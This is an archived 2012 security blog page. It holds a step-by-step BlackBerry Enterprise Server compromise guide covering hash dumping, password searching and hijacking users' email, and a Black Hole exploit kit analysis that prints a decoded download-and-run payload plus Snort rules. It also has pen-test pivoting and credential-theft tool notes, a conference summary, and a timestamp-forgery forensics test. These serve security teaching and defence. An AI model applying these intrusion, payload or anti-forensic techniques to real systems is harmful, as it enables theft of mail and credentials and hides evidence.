Tuesday, January 31, 2012

Exploring Your Browser LocalStorage

by Neelay Shah.

HTML5 adds number of new features and technologies to allow developers to build rich and immersive web applications. One of the features introduced is the "LocalStorage" that allows web applications to store data in a "persistent" fashion in a client (browser) side store.

Foundstone HTML5 Local Storage Explorer is a Firefox extension that allows for viewing, modifying and deleting of data items stored in the browser's LocalStorage.
It also allows the user to copy the contents of the Local Storage to clipboard.


You can download and install the extension from:


Here's the menu bar button that can be used to invoke HTML5 Local Storage Explorer once it is installed

Here's the main screen which displays the contents of the Local Storage. It allows emptying the local storage, refreshing its contents, copying its contents to clipboard, view the version and developer information and closing the add-on window

Tuesday, January 24, 2012

Hack Tips: Blackberry Enterprise Server Exploitation

By Tony Lee and Patrick Bogen

This article is the first in a series covering, step-by-step, the practical attacks that can be performed against various common network servers. This week’s victim is Blackberry Enterprise Server. Compromising this service allows the attacker to impersonate users, access stored e-mail, and send arbitrary messages to users on the Blackberry system.

Overall, the process involves the following steps:
  1. Identifying a Blackberry Enterprise Server
  2. Identifying the BES Administrator Account
  3. Gaining Access to the BES Administrator Account
  4. Accessing the Blackberry Management Interface
  5. Post-Exploitation with Blackberry Manager

Identifying a Blackberry Enterprise Server

There are at least four ways (ordered below by most certain to least certain) to identify if a given server is a Blackberry server- viewing the list of services running on the host; locating the server software files on the host; examining the list of service accounts on the host and identifying a Blackberry-associated account; or potentially by simple inspection of the system hostname.

Running Services

The Blackberry Enterprise Server software uses a number of services to handle requests. If any of these services are running on a host, it indicates that the system is, by definition, running the Blackberry Enterprise Server. Check for some of the services listed below:

C:\> net start | findstr /i blackberry
BlackBerry Alert
BlackBerry Attachment Service
BlackBerry Collaboration Service
BlackBerry Controller
BlackBerry Dispatcher
BlackBerry MDS Connection Service
BlackBerry Policy Service
BlackBerry Router
BlackBerry Synchronization Service

Server Software Files

The Blackberry Enterprise Server software installs, by default, in “C:\Program Files\Research In Motion\BlackBerry Enterprise Server”. The presence of these files strongly suggests that the server is a Blackberry Enterprise Server.

User Accounts

There is no specific required name for the server account, but the server documentation uses “BESAdmin.” The presence of this account would indicate that the system is a Blackberry Enterprise Server (and, further, that the administrator is fairly literally-minded). Variations on this are also possible- for example “besadm,” “bbadmin,” and so on.

Host Name Convention

Organizations commonly name hosts based off of the functionality, location, or sometimes even the owner of the host. This is intended to be convenient for the administrator to easily determine useful information about the host and also facilitates easily training new staff. This convenience introduces a slight security risk, in that these hosts can easily be targeted by attackers based off of the information the administrator includes in the hostname. Organizations that conveniently name their hosts are likely to name their Blackberry server something like “BES,” “Blackberry,” “BBServer,” etc. This is not an especially reliable indicator, but it can be used to triage hosts for further scrutiny.

Identifying the BES Administrator Account

Once a specific server is targeted, the attacker needs to identify the Blackberry administrator account on the system. This can be accomplished by examining the contents of the “Documents and Settings”/“Users” directory and examining locations or permissions on the BES files.

“Documents and Settings” or “Users” Directory

The “Documents and Settings” or “Users” directory will contain a subfolder for each user that has logged in to the system. Since the Blackberry Administrator account will be one such user, a directory for this account will likely exist in this hierarchy.

C:\>dir c:\users
Volume in drive C is OS
Volume Serial Number is

Directory of c:\users

11/10/2011 08:10 AM <DIR> .
11/10/2011 08:10 AM <DIR> ..
12/02/2010 09:02 AM <DIR> alice
09/01/2011 10:08 AM <DIR> bob
07/13/2009 11:57 PM <DIR> Public
05/19/2011 01:43 PM <DIR> Administrator
11/07/2011 03:26 PM <DIR> BESAdmin
0 File(s) 0 bytes
7 Dir(s) 23,291,475,804 bytes free

BES File Permissions or Locations

The Blackberry administrator account may have special permissions set on the files related to the BES software. Checking the permissions set on such files to discover which account has special access may reveal the blackberry administrator account. Locate one of these files (i.e., in C:\Program Files\Research In Motion\BlackBerry Enterprise Server), right click on the file, select “Properties,” and select the “Security” tab. Shortcuts on a user’s desktop can also help to identify that user as a BES administrator.

Gaining Access to the BES Administrator Account

There are four main approaches to gaining credentialed access to the administrator account. The first, of course, is to compromise the Domain, if the account is a Domain account and not local to the host—however, gaining control over a target’s domain is left as an exercise to the reader. The other three options can be accomplished with access only to the local host: The attacker can collect password hashes from the local SAM if the account is local to the host; collect password hashes (for both local and domain accounts) from memory using the Windows Credential Editor; or discover a file on the local system that contains credentials. Given password hashes, the attacker would then need to crack the passwords or replay them into a process that would be able to open the BES thick client- a “pass the hash” attack.

Dumping Local Password Hashes

A variety of tools exist for dumping password hashes. It is often the case that a single tool works only on a subset of the various versions and deployments of Windows. Example tools that can perform in this role are:

There are variant versions of even these few tools available that work on certain Windows versions and not others, so it is often the case that multiple attempts will be needed with different tools before one tool is found to work properly.

Using Windows Credential Editor

The Windows Credential Editor, from Amplia Security, performs a function similar to the hash dumping tools described above, but instead gathers hashes from in memory.
The tool’s functionality is simple- run the tool at the command line, and it will list the hashes extracted from memory:

C:\> wce.exe
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.


Data-mining the Filesystem

Searching the file system can reveal instances where administrators have stored the user’s password in plain-text (for example, in a configuration file, or potentially a “notes” document.) The Windows command shell contains native commands that can accomplish such a search. The following command searches the contents of files on the system drive for the phrase ‘pass’:

C:\> findstr /I /S /M pass C:\*

Alternatively, searching for the known username might reveal files that contain the username and password pair (this will also reduce incorrect hits):

C:\> findstr /I /S /M BESAdmin C:\*

Searching for files with “pass” in the filename can be accomplished with the following:

C:\> dir /a /s /b c:\*pass*

Accessing the Blackberry Management Interface

Blackberry Enterprise Server provides two methods for managing the system: A web-based front-end (which must be specifically installed by an administrator) and a thick client application, “Blackberry Manager”.

Web-based Front-end

If installed, the web interface will be available at the following URL:


Blackberry Manager

The thick client management application, “Blackberry Manager,” is installed along with the server software, and thus should be available on the server in the following directory, presuming the server software is installed in “C:\Program Files\Research In Motion\BlackBerry Enterprise Server\”:

C:\Program Files\Research In Motion\BlackBerry Enterprise Server\BBMgr\Server\bbmgrw32.exe

When accessing the thick client application as a non BlackBerry administrator, the application will prompt for credentials. However, when the user is logged in to Windows as the Blackberry administrator account, the application will open without prompting for credentials.

Post-Exploitation with Blackberry Manager

Having finally gained access to the management interface of the blackberry server, there are three activities that are of interest to an attacker. The management application can be utilized to send messages directly to a user’s blackberry device (bypassing the Exchange email server); to send messages to both the device and to the user’s e-mail; and, most damaging of the three, to re-provision devices, thus granting an attacker’s device access to the target’s saved e-mail.

Sending Messages Directly to Blackberry Devices

From the “All Users” tab, search for or select a user. Right click on the targeted user and select “Send Message”. Sending messages by PIN (rather than by e-mail) will send the message only to the user’s Blackberry device (not to their email account).

Sending Messages to Blackberry Device and E-Mail

From the “All Users” tab, search for or select a user. Right click on the targeted user and select “Send Message”. Sending messages by E-Mail (rather than by PIN) will send the message to both the user’s Blackberry device and the user’s associated Exchange account.

Provisioning a New Device

Once a new phone is provisioned, the attacker can download a copy of all of the user’s emails, as well as send emails as the account owner. Unlike Good Enterprises (discussed later in this series), only one device per e-mail address can be registered per Blackberry Enterprise Server. This means that if the attacker provisions a new device on the target’s account, service to the target’s old device will be disrupted. For this reason, provisioning a new device is a temporary mechanism to access the stored e-mails rather than a persistent compromise of the user’s account—unless there are multiple Blackberry servers.

The attacker must re-activate the user’s old device after exfiltration of any data of interest in order to minimize the chance of the target noticing a disruption in service.

Tuesday, January 17, 2012

JAVA/HCP/ Black Hole Exploit Kit malware analysis

By Christiaan Beek


A couple of weeks ago there was a good amount of commotion around the usage of Java and the Black Hole exploit kit to infect users. While I was in Abu Dhabi teaching class I remembered that two weeks ago we had a similar case where Java and URL-structures used by the Black Hole exploit kit were used, so I decided to write up a little post to help explain it.

The attack started with a targeted email towards a certain department containing a URL where victims could download the error-report.

This email contained a ‘suspicious’ URL:


This URL points to a site which is empty and shows the message “page is loading…wait’. In the source code of the page, the following URL’s were discovered:

In this page there are 4 URLs which are accessed – all of them contain the same JavaScript file

In the Java file, another URL is hidden:

This site was actually hosting several different pieces of malware:


Malware behavior

In an isolated lab environment, the following URL was executed to study its behavior:


The JAR file contained several instances of obfuscated code which made it slight difficult to analyze. After the first part was decoded the infection vector became clear:

The first part of the script (after eval) was obfuscated by using decimal code. First I used Malzilla, went to the tab misc decoders, and pasted the script. By selecting the right area, I clicked the option ‘decimal’ and the obfuscated piece was decoded:

Infection vector

In the first couple of lines the following can be detected: [hcp://services …. Helpctr.exe] – this points out that The Microsoft Help and Support Center URL Escaping vulnerability is being used. In the above fragment, the Escaping is done by using multiple ‘%A’s. This vulnerability is documented in CVE:2010-1885

Malware behavior continued

In the decoded part of the vulnerability the following became visible:

eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://advxxxxxxxxxx.com/content/hcp_vbs.php?f=166::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe)))

First it creates a VBS file (I.vbs) in the %TEMP% folder and initiates a GET request for another web resource through the XMLHTTP object. The web resource is another VBS file faked as a PHP file:


The ‘hcp_vbs.php?f=’ part of the URL is known to be part of the ‘Black Hole Exploit Kit’.

Blackhole Exploit Kit: ‘The Black Hole exploit kit is an unethical off-the-shelf Web application. The first instance - v.1.0.0 beta - has appeared on the black market and was advertised in August 2010 as a "System for network testing". As with most of the exploit kits, it is based on PHP and a MySQL backend. The payload of this kit usually targets Windows operating systems and an application installed on those systems, but depends on the criminals' end goal. ‘(source: http://community.websense.com/blogs/)

After the l.vbs file is created it will be executed. The heavily obfuscated code was analyzed and following interesting parts became visible:

This particular piece of the application is checking which versions of Java/PDF and Flash are on the system. Another piece of code shows that the UserAgent information is being read to determine which device or Operating System is used by the client:

This information is sent back to the Black Hole Kit gateway and available exploits will be sent back to take-over the machine and execute remote commands etc.
In my Lab, I used an un-patched version of Windows X and an outdated version of Shockwave Flash. Acrobat and Java were up to date.

Next, the delivery mechanism retrieved a variant of the TDSS rootkit.

Memory analysis

After infecting the labs machine an acquiry of the memory was taken for analysis. Using several tools it became clear that that traces of malware hooked themselves into the following (valid) Windows processes:
  • IExplorer
  • SVChost
By dumping malicious parts of the memory, I was able to compare them using our internal malware database and the website Virustotal.com. Only 7 out of 43 AntiVirus engines were capable of detecting this variant of TDSS/Alureon.


Check if your systems are patched for the HCP vulnerability:

SNORT detection rules (source Chris Wakelin)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media
Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
sid:2013077; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit";flow:established,to_server; content:"/pch.php?f="; http_uri;
pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2";
flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri;
pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;

Monday, January 16, 2012

Infiltrate Wrap Up

By Brad Antoniewicz.

Last week I spoke at Immunity’s Infiltrate 2012 at the Gansevoort Hotel in Miami Beach. The single-track conference was small-medium sized, having around 200(?) people in attendance.

Infiltrate’s coordinators made being a speaker feel like being a celebrity. Flights and hotel rooms were paid for, a car picked me up at the airport, the location was fun, and for all attendees - breakfast, lunch, and dinner were provided. The open bar opened at 1pm everyday. It was awesome.

The CFP and conference preparation process made me feel like the organizers really cared about having quality presentations. It was nice to receive a phone call from a technical team asking questions to feel out exactly how put-together and complex the work I was doing was. The pre-conference dry-run was a nice touch too, and although there weren’t many questions or suggestions for my talk, it was nice to have some outside opinions. Another nice touch was that Dave Aitel was involved in much of the CFP and preparation process, which further demonstrated how much he really cared about putting together a good conference.

Even though there was a good amount of involvement in vetting speakers and a lot of planning clearly went into the conference, I was a little surprised that some talks were already presented at other conferences. I shouldn’t really be criticizing this (since I’m giving the same talk at Shmoocon in two weeks) but I think Infiltrate has worked hard to raise the bar when it comes to talks – a goal that I greatly admire. I think that the more times a presentation is given, the less exotic the content becomes. So even if the research produces amazing insight, everyone already knows about it, so the content is no longer “the best of the best”. At other conferences I think its ok to see a presentation if it has been given a few times already, but I think if Infiltrate wants to maintain the perception that only the best of the best talks will be presented, then they need to vet out the duplicates.

Also, there were just a couple of the talks were not as “offensive” as I had hoped. With the bar raised so high, my expectations are even higher, so if I don’t see stuff getting completely ripped apart and owned, I feel like it’s something better presented at a conference with less emphasis on total pwnage.

Reservations aside, the majority of content at Infiltrate was engaging and though-provoking - exactly what I’d expect from a security conference.

Little Things:

  • Badges – I’m still not sure how I feel about this, but at infiltrate, your conference badge was a wristband. Badges are traditionally a fun little knick-knack at every conference, usually containing some sort of encoded message, challenge, etc... but at Infiltrate, that didn’t exist. Does it matter? Would I sacrifice an open bar for a cool badge? Probably not.
  • Event support staff – Everyone I encountered was extremely nice and quick to offer a helping hand whenever I had a question or needed anything.
  • Presentation Lengths – Talks were 45 minutes. I think they should have been 60. Some talks were cut short for the sake of time, while others went over, affecting the flow of the conference.
  • Lunch and Dinner – Food was really good and tasty, deserts (my specialty) were outstanding!

Overall Impression

I have to say that it’s refreshing to attend and be involved in a conference like Infiltrate. Our industry is getting over saturated with conferences that are filled with stale and sometimes un-inspiring content. If we cannot collectively raise the bar, we’re not motivating ourselves to produce creative and innovative research – and if we’re not doing that, we might as well surrender our intellect, curiosity, and integrity to the vendors who would prefer to ignore the security of their customers, to increase their profits.


Here’s a quick run-down on the talks that I was able to take notes on. Keep in mind that I’m not an expert in really any of these topics, so I’ll try my best to summarize accurately but if you really want to know the specifics, look around online or contact the presenter.

Day 1 Keynote – Thomas Lim

Thomas’ blunt and extremely entertaining presentation style kicked off the conference spectacularly. His talk resonated with me throughout the conference. The keynote started by discussed the challenges of running a good conference. Most conferences don’t make more than $10k, which means, given the amount of time invested, the organizers end up losing money or barely breaking even. Another major challenge is with finding good speakers. In his experience there is a little bit of a talent problem:
  1. It’s hard to find people who are doing amazing things
  2. It’s common to get a CFP response from someone who writes really well, but whose actual content is lacking or who presents horribly. This can really negatively impact a conference
  3. There are a lot of people who keep reusing content - he said that a good rule of thumb is to avoid presenting the same talk more than 3 times.
Thomas also mentioned the threat and severity of Cyber warfare. He explained that it's much cheaper for a government to train a cyber-army then it is to train a real one, and that there are ongoing attacks originating from countries like China against the United States on a regular basis. He questioned why the US isn’t retaliating against these attacks, implying that the U.S. may be reluctant due to a dependence on China.

Voight-Kampff'ing the Blackberry Play Book - Zach Lanier/Ben Nell

The title is a reference to Blade Runner. Zach and Ben’s information-packed presentation covered a number of different vulnerabilities they’ve discovered in the Blackberry Playbook. Although many of the vulnerabilities have been already addressed by RIM and spoken about, it was very interesting to see the types of issues they uncovered. An interesting discovery was around a legacy QNX “feature”, which is applicable to any services that leverage Persistent Publish/Subscribe(PPS). Configuration and other files are stored within the PPS directory structure, and are protected by POSIX file permissions. Although the permissions appropriately restrict unauthorized applications from accessing their contents, a mirror of the file contents are provided within a “.all” file, which has much more relaxed permissions. This means that sensitive information - session tokens, and PINs, for example is accessible to anything that has local access.

Next, any native code application can essentially bypass application permissions and do pretty much anything. Lanier and Nell apparently wrote an application that, from the user’s perspective, required no permissions, but once run, served a shell to a remote host.

Applications within the app store are assigned an identifier. Every version of the application is assigned a unique identifier and those versions are always available on the app store. The problem is that the identifier is sequentially assigned, and the URL providing the application does not require authentication. This means that anyone can download any application and application version for free.

Finally, the two spoke about Sapphire proxy, which is an internal service that is used as part of "bridge" - a service involved in Bluetooth communication. Since the Playbook uses Bluetooth to pair with a central messaging device, you can leverage Sapphire proxy to intercept and view email, as well as other messaging data.

Unearthing the World's Best WebKit Bugs - Michel Aubizzierre

Michel’s quirky slides were right up my alley and had me chuckling. His presentation was around reviewing public development braches for open-source projects (this talk was around WebKit) and tracking code developers who are known to patch bugs or write code that contain bugs. Using that information and tags that are included within bug reports, he wrote a proof-of-concept tool to uncover vulnerabilities that have yet to reach the stable branch. He mentioned that his tool identified somewhere around 76,000 potential bugs, but it is difficult to tell which are actually exploitable. Additionally, since many of the bugs that fit this criteria are restricted from public viewing, its difficult to truly measure the severity and accuracy of the bugs identified.

Effective Denial of Service Attacks Against Web Application Platforms -Alexander Klink/Julian Waelde

This presentation was already presented at CCC on December 27th, although I missed the live feed for it, I did read a little bit about the attack online. That being said, Klink and Waelde did update the slides to include vendor responses, which I found to be interesting. Additionally, it was nice to be able to ask them questions when I just so happened to sit next to them during the conference.

Here’s a summary of vendor responses, and resolution status:

  • PHP has a workaround in PHP 5.3.9
  • ASP.NET is patched as of Dec 29th (MS-11-100), exploit code exists.
  • Java is more susceptible, and since it used by many different application servers, has a wider reach to things like Apache, Glassfish, Jetty, etc..
    • Apache Tomcat - Workaround Patch 7.0.23, 6.0.35
    • Oracle GlassFish - Will be fixed (S0104869)
    • Oracle does not plan to fix the issue in Java, but rather have the Application server handle it
  • Python - No Response, under "active discussion" on mailing lists
  • Ruby - Fixed in 2008 version 1.9, other deriviates
    • CRuby/JRuby/Rack fixed Dec 28th.
  • v8/node.js (Javascript implementation by Google, used on server side) patches exist, but not implemented.
If no fix is available for your platform - You can limit the number of POST size.

A Heap of Trouble: Breaking the Linux Kernel SLOB Allocator - Dan Rosenberg

Dan's talk covered one of the Linux kernel's heap allocators, called the SLOB (Simple List of Blocks). He mentioned there are three allocators, SLUB, SLAB and SLOB -- with SLOB having just about no sanity validation or exploit mitigation compared to other allocators. This allocator is commonly used in embedded Linux distributions such as OpenWRT. He mentioned that he plans on releasing a whitepaper, and right after the conference, he tweeted about libplayground, a framework for delivering Linux kernel heap exploitation techniques.

Day 2 Keynote - Andrew Cushman

Andrew Cushman leads the Trustworthy Computing Group at Microsoft. His keynote covered a handful of interesting ideas, looking at the need for adaptive change within the industry as a whole. He's seeing shifts in attacks from networking and infrastructure equipment to intellectual property, foundations, and business models. In turn, this moves security controls from security engineering and operations to government regulations, cyber security policies, and similar agendas. There are even groups exist that would like to see Internet governance shift to a multi-country regulatory body. (yikes)

He also discussed Microsoft's approach to handling security mechanisms within its software. Microsoft has evaluated exploit economics and devised a way to reduce the appeal of attacking their software. In short, Microsoft works to decrease an attack’s ROI by increasing the attacker's investment (more time spent learning, developing attacks) and decreasing attacker opportunity to recover investment (quicker patch turn around via windows update).

Finally, Cushman wrapped up his talk by saying that exploit mitigations raise the bar for attackers, and he suggests that if you don't want to spend the time to learn the advanced techniques, social engineering is the next best thing, since it requires less technical skill but can have a devastating effect.

Attacking Proximity Card Access Systems - Brad Antoniewicz

If you ask me, I thought it was a good talk :)

Secrets in Your Pocket: Analysis of [Your] Wireless Data - Mark Wuergler

Mark's extremely well designed presentation (his twin brother is a graphic artist) was the result of many months of data collection and analysis. He discussed the potential of tracking people via the wireless data originating from their cell phones or other always-on devices. Although I've seen a couple of different research studies around this, Mark's presentation was unique in the sense that he created a tool, called Stalker, that takes an input PCAP and analyzes the data within it to create a profile of a user. It also fetches information from outside sources to complete the overall picture. There are some caveats- the data shouldn't be encrypted to get the most out of the tool, and some of the techniques the tool uses require a few specific environmental factors to be present. Mark also noticed that on certain mobile devices, if they're connected to a wireless network that doesn't provide DHCP, the device will attempt to blindly ARP out to the default gateway of previously-used wireless networks. If on an open wireless network, these ARPs can be observed and used to identify where a person has been. Perhaps even more interesting than the actual tool were some of the active attacks Wuergler showed against users on open wireless networks (implemented by the tool). An access token is sent when using Facebook-enabled applications (such as Pandora); if an attacker can obtain this access token, there is a possibility that the attacker can create a forged request to increase the privileges of the application (which are set client-side). The attacker could then access any of the user’s Facebook data (inbox, status, pictures, etc.).

Undermining Security Barriers - further adventures with USB - Andy Davis

Andy's talk was previously presented but updated to account for the release of a new tool, FrisBee Lite. Although there are some tools for USB testing, most are expensive and somewhat limited. The $1200 Packet Master USB 500+ AG is described as Wireshark for USB with injection capabilities. The issue is that the supporting software thats packaged with the device has a non-existent API and a limited scripting language, making it difficult to leverage it for more comprehensive fuzzing. Even then, the presenter wrote a script to create basic fuzzing test cases, but it was very slow and restricted. The next approach was an Arduino-based tool called FuzzBox, which was greatly limited since it could only emulate USB HID devices. FuzzBox is also pretty slow due to speed constraints on the Arduino.

FrisBee Lite is a wxPython application that makes fuzzing relatively simple, via a point and click Windows GUI. The tool has been leveraged to find flaws in Solaris, the Xbox, iOS, and Mac OS X. An interesting side effect of the fuzzing was that when the author was testing certain operating systems with endpoint protection software installed, he actually found cases that crashed the software responsible for monitoring the insertion of USB devices.

Don’t Hassle The Hoff: Breaking iOS Code Signing - Charlie Miller

Although I previously saw a good amount of coverage around Charlie Miller's iOS code signing hax, his presentation was still informative and entertaining. The initial David Hasselhoff application he attempted to get published to the app store was a hilarious back story.

Tuesday, January 10, 2012

Just That Easy: Real World Pen Testing Attack Vectors [Part 2]

By Tony Lee and Robert Portvliet

Whether you agree with the term Advanced Persistent Threat (APT) or not, the capabilities are certainly out there—often in freely available tools (nod to Metasploit, WCE, nmap and other tools). Adversaries do not care that they can obtain Domain or Enterprise administrator access; it is what they can do with those permissions after they achieve that privileged access. This is what should keep CISO’s awake at night.

Things CISO’s should question:
  • What are our critical assets?
  • How easily can the attackers find and access those critical assets?
  • What will attackers do with that information? Post to the web? Sell it?
  • How will the media cover this?

These are the motivating factors for organizations to conduct these real world assessments. These assessments show impact--thus we will continue with part 2 of our series on real world pen testing.

Critical Assets

After performing the type of research (as shown in Part 1 of this series), you would imagine that you know what the critical assets are... or do you?


How does the organization make their money?

Not all organizations make money by selling a product; some sell other intangible things such as information or personnel records, processing, etc. Your POC can help you determine what is critical to the organization. In this example, we are targeting Acme Industries and their business is selling widgets there are a number of items of interest.

  1. Widget designs – blueprints, schematics, dimensions on how they make those widgets
  2. Widget formulas – What goes into making those awesome widgets? What chemicals are used?
  3. Widget creation process – What is the process (exact steps) for reproducing a widget?
  4. Widget improvements – What is the latest feature of the (soon to be released) widget?
  5. Widget marketing – What are they going to release and when? Can we beat them to it?
  6. Etc. The list goes on…

Not So Obvious:

Company enablers – What enables the company to exist? Finances of the organization, employees, key individuals, partnerships, etc.

  1. Organization Finances – Purchases, deposits, clients, balances
  2. Employee data – Roles, responsibilities, personal information (PII)
  3. Key individuals – Sensitive information on C-level execs, key scientists, inventors
  4. Partnerships – Key relationships with other companies

Accessing the Critical Assets

After identifying the critical assets listed above, and gaining that initial foothold as shown in part one, now you need to find and access the goods.

Location of Goods:

The critical assets are usually stored in both local home directories as well as file servers. Local home directories are usually used as a sort of scratch pad where as the centrally managed file servers are used to store completed projects and deliverables. Sometimes local home directories are actually central file servers due to distributed storage and ease of backup. This can make data mining easier for an attacker if everyone’s home directory is in one location.

One way you can tell where the home directory goods are stored is using “net user”:
net user TonyLee /domain

User name TonyLee
Full Name Tony Lee
Comment Guy writing this article
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never


Home directory \\CentralServer\TonyLee
Last logon 1/2/2012 7:28:17 AM

Logon hours allowed All

Local Group Memberships *Administrators *Users
Global Group memberships *Enterprise Admins
The command completed successfully.

Other places to search for central repositories of critical assets are within Active Directory (will be covered in a separate entry).

Privileges Required to Get the Goods:

You don’t always need DA or EA. Sometimes all you need is the database service account credentials if your goods reside in a database. You can also try to target goods by targeting specific people that would have access to it. For example, when targeting PII, we can target HR, payroll, legal, or finances personnel. When we are stealing project designs, formulas, and process, we will target project managers (good bang for the buck), designers, or scientists. When after promotional information, marketing and legal personnel are great resources.

This useful targeting information is usually found internally in the employee directory (intranet.companyname.com) or externally via the company website or Linkedin.

Note: In order to access internal Intranet websites from outside the company, use one of the hosts obtained in Part I of the series as a pivot point and redirect web requests through that host via meterpreter’s portfwd:
meterpreter > portfwd add -l 8080 -p 80 -r IP.AD.DRE.SS
[*] Local TCP relay created: <-> IP.AD.DRE.SS:80

Open a browser and navigate to http://localhost:8080 and you will be able to surf the intranet website as if it were local.

Domain Admin or Enterprise Admin level access may not always be required; however it is useful to have when propagating to other hosts within the domain. We will discuss in detail our favorite ways to get this level of access in the next article, but for now we will leave you with a few ideas.

The primary culprits of leaking this access are:
  1. Service accounts with too much privilege
  2. Admins that regularly use their EA and DA access
Best ways to steal and use this level of access are:
  1. Steal_token
  2. Incognito
  3. Windows Credential Editor
  4. Gsecdump
  5. MSF’s psexec
Details to follow in our next article in this series…

Tuesday, January 3, 2012

Windows Timestamp Tampering

By Glenn P. Edwards Jr.

From time to time someone will bring up the topic of Windows time stamp manipulation and if it’s not related to a piece of malware then it’s generally about Timestomp or touch. These discussions usually contain the same repetitive information – most notably being to check the time stamp values of the file (in NTFS everything, including directories, is considered a file) in the $MFT and see if anything stands out. This is usually done by looking at the $STANDARD_INFORMATION and $FILE_NAME attributes for each file. During the rest of the post these two values will be referred to as $SI and $FN.

In regards to the $FN attribute, Brian Carrier states that “Windows does not typically update this set of temporal values like it does with those in the $STANDARD_INFORMATION attribute, and they frequently correspond to when the file was created, moved, or renamed," (page 318).

There’s been previous write ups regarding time stamp manipulation and Rob Lee has also created some great charts outlining rules for time stamp changes. In the Windows world the NtSetInformationFile function, which is inside of NTDLL.dll, is used to set the MACE timestamps on files within NTFS.

MACE timestamps explained:
  • M – modify
  • A – access
  • C – create
  • E – entry modified (sometimes also referred to as a ‘B’ for Born date)
Recently, there’s been some chatter again about this topic throughout the DFIR community; however, this time there was something different information being discussed – modifications of the $FN values. It isn’t something impossible if you think about it, why couldn’t they be changed? Examples of how to do it have been publically available but the tool setMACE got some noise because it’s able to modify the $FN values in an automated and easy way.

If you’ve looked at Rob Lee’s charts or read about the $SI and $FN in Harlan’s Book then you’re aware of the different scenarios that can affect how these values change (i.e. whether they’re copied, moved, moved to another volume etc.). setMACE uses a move ‘trick’ in order to be able to change the $FN values. Basically, if you choose to change all four values in both attributes then it will:
  1. Set the $SI values to what you choose
  2. Create a randomly named folder on the volume
  3. Move the file to that new folder (on the same volume)
  4. Set the $FN values to match the arbitrary $SI values

To date, throughout my investigations I have yet to see any indication of all (8-12) of the $SI & $FN be tampered with… but that doesn’t mean I shouldn’t be aware that it can happen. It’s generally just the $SI that gets altered because there’s a documented Win32 API for dealing with them.

Windows timestamps can be an invaluable piece of information to an investigation but you should also be aware of other ‘features’ which may cause confusion during your analysis (i.e. Windows Tunneling).

Testing Process

The testing process outlined below was repeated with an attached NTFS formatted USB drive across the following combinations:

  • Windows XP x86 w/ SP3
    1. administrator account
    2. limited user account
  • Windows 7 x64 w/ SP1
    1. administrator account
    2. limited user account
  1. Created a file with a short filename on that USB drive:
    c:\>echo "short file" >> E:\short.txt

  2. Created a file with a long filename on that USB drive. Because of the 8.3 filename limitation, I wanted to test if a file with a long file name would have all of its $FN attributes values modified (since there’d be more than one as opposed to shorter file name in step 2).

    c:\>echo "long file" >> E:\longfilename.txt

  3. Grabbed the $MFT prior to tampering
  4. Ran setMACE against both of the files with the options to set all of the $SI and $FN timestamp values to a new value:

    c:\>setMACE.exe "E:\short.txt" -z "2000:01:01:00:00:00:789:1234" -x
    c:\>setMACE.exe "E:\longfilename.txt" -z "2000:01:01:00:00:00:789:1234" –x

    * dates may appear different in my results because I switched it up sometimes to see what would be produced.
  5. Grabbed the $MFT after tampering.
  6. While there’s a few tools out there for $MFT parsing, I chose Harlan Carvey’s mft.pl and it against it each of the $MFT’s

    c:\>perl mft.pl $MFT.original > mft.original.txt
    c:\>perl mft.pl $MFT.tampered > mft.tampered.txt

    * When run under a limited account on a system using UAC, as expected, the prompt is displayed and requires administrative privileges in order to carry out its modifications (be aware that this can be bypassed):

I didn’t want to flood the post with the output of all of the tests but I did want to include some evidence/indication of what the $SI and $FN values will look like after such an event occurs. Below are the results from using setMACE on a Windows 7 x64 machine running as an administrator:

Original Tampered
35 FILE Seq: 1 Link: 1 0x38 3 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:56:11 2011 Z
A: Thu Dec 29 22:56:11 2011 Z
C: Thu Dec 29 22:56:11 2011 Z
B: Thu Dec 29 22:56:11 2011 Z
0x0030 112 0 0x0000 0x0000
FN: short.txt Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:11 2011 Z
A: Thu Dec 29 22:56:11 2011 Z
C: Thu Dec 29 22:56:11 2011 Z
B: Thu Dec 29 22:56:11 2011 Z
0x0080 40 0 0x0000 0x0018

36 FILE Seq: 1 Link: 2 0x38 4 Flags: 1
0x0010 96 0 0x0000 0x0000
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
0x0030 120 0 0x0000 0x0000
FN: LONGFI~1.TXT Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
0x0030 128 0 0x0000 0x0000
FN: longfilename.txt Parent Ref: 5 Parent Seq: 5
M: Thu Dec 29 22:56:16 2011 Z
A: Thu Dec 29 22:56:16 2011 Z
C: Thu Dec 29 22:56:16 2011 Z
B: Thu Dec 29 22:56:16 2011 Z
0x0080 40 0 0x0000 0x0018

